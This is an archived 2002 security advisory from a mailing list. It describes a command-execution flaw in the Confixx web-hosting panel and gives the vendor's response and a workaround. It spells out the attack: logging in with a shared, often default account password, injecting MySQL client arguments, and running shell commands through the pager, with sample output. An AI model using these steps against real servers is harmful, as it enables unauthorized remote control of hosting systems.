[UNIX] Confixx Vulnerability Allows Attacker Remote Control of the SQL Server

From: support@securiteam.com
Date: 07/26/02


From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 26 Jul 2002 15:42:21 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Confixx Vulnerability Allows Attacker Remote Control of the SQL Server
------------------------------------------------------------------------

SUMMARY

 <http://www.yippi-yeah.com/de/p_confixx.php> Confixx is a comfortable
tool to automate customer administration on Linux-based web servers with
graphical interfaces for Administrators, Resellers, and End Users. A
security vulnerability in the product allows attackers to execute
arbitrary commands on the server practically allowing him to remotely
control the server.

DETAILS

A security vulnerability in Confixx allows attackers to execute commands
on many confixx-boxes nearly without the need to get a valid account. All
you would need to know is:
 - Whether the web hosting provider is running Confixx
 - The password of the "mysqlshell-user"
 - Access to the MySQL server

Since the password of the "mysqlshell-user" is the same for all customers,
gaining access to it is trivial. The "mysqlshell-user" is shell limited,
however, using the below technique elevated access can be reached.

NOTE: Some providers neglect to set a hard to guess password leaving it
set to 123456.

With this account and password, you can do the following:

---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password: <-- enter here the password from the
mysqlshell-user

Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------

Here you have to enter the following string:
 -e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1

After that you will be prompted for a password, enter your PASSWORD (from
the user "-e" on your MySQL server).

---------------
web1
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
..
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
..

Vendor status:
A customer, who uses confixx, informed the vendor about 20 months ago.
Resulting in Confixx adding the following line: export
EDITOR="/bin/false";. Therefore an attacker cannot use "edit;" at the
MySQL prompt and get through it an interactive shell.

However, you still can login to the MySQL server and still execute
commands.

Workaround:
Delete the "mysqlshell-user".

ADDITIONAL INFORMATION

The information has been provided by <mailto:rd@mesos.de> Ralf Dreibrodt.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • Re: PHP/MySQL security issues
    ... MySQL - I would be very concerned about storing anything PCI, HIPPA or SOX related data in a MySQL db. ... even such sensitive data on a MySQL server, as long as you can guarantee ... Security is paramount and the others offer some additional sense of security through obscurity. ... Open Source has GREATER security than closed source. ...
    (comp.lang.php)
  • RE: [PHP] "cannot load mysql extension" - PHP Installation on Vista/Apache
    ... I'm using native mySQL btw, ... 'tight security' as a strive from the developpers to have a good security ... Learn how to setup a server on a unix system, ... cus they have no fans on em so make no noise;) and install a linux distrib ...
    (php.general)
  • Re: PHP/MySQL security issues
    ... I would be very concerned about storing anything PCI, HIPPA or SOX related data in a MySQL db. ... even such sensitive data on a MySQL server, as long as you can guarantee ... Too many very talented hackers have access to source code making it much easier to locate and exploit vulnerabilities in a manner not possible with Oracle or DB2 or even SQLServer. ... Security is paramount and the others offer some additional sense of security through obscurity. ...
    (comp.lang.php)
  • confixx (remote access)
    ... Confixx is a comfortable tool to automate customer administration on ... the password of the mysqlshell-user is the same for all customers. ... Welcome to the MySQL monitor. ... attacked server and you can still execute commands on this server. ...
    (Vuln-Dev)
  • [NEWS] General Security Guidelines (MySQL and SQL Web Interfaces)
    ... General Security Guidelines (MySQL and SQL Web Interfaces) ... Anyone using MySQL (or any other SQL server) on a computer connected to ... This port should be inaccessible from untrusted hosts. ...
    (Securiteam)